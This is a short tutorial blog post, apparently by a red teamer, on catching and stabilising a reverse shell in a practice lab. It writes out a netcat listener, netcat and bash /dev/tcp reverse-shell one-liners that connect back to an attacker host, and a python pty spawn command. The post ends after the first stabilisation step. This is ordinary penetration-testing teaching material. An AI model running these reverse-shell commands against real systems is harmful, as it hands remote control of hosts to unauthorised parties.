Netcat Shell Stabilization

ice-wzl
5 min readJul 24, 2021

Considering all the hard work it takes to receive a reverse shell from a target, it is imperative that we work to stabilize the shell as soon as possible.

This is a multi-part process that will yield you access to text editors, the ability to interact with programs on the host, and full visibility into stderr.

First, we log into our attack box (ice-wzl@kali) and our target box (shell@linux-shell-practice).

Now lets start our listener first on our attack box:

nc -nlvp 1234

Next, we will execute this command on the target box:

nc attack-box-ip port -e /bin/bash

Note: This -e /bin/bash option with netcat will not work on every host, it depends what version of netcat they have installed. Alternatively you can use this command to receive a bash reverse shell:

bash -i >& /dev/tcp/attack-box-ip/port 0>&1

This picture below shows both commands working for this host:

Note: the & in the nc command backgrounds the command to allow me to show the second option in action without having to re-ssh.

Notice how the bash reverse shell (bottom right side) provided a more stable shell right off the bat versus the netcat reverse shell in the top right. After receiving a call back with netcat it is always a good idea to issue a command like whoami, or id to confirm that you received a shell and not just a connection with no shell access.

Lets stabilize. To get a fully functional and stable shell, it is a multi part process. Issue these commands in order to avoid any potential errors.

Step 1: Python

python -c ‘import pty;pty.spawn(“/bin/bash”);’

python3 -c ‘import pty;pty.spawn(“/bin/bash”);’

Either of these commands will take the first step in shell stabilization as you can see below. Note depending on the version of python installed on target will determine which command you run. I always like to check before I execute commands.

--

--

ice-wzl

Reverse Engineer, Red Teamer, CTF fan & creator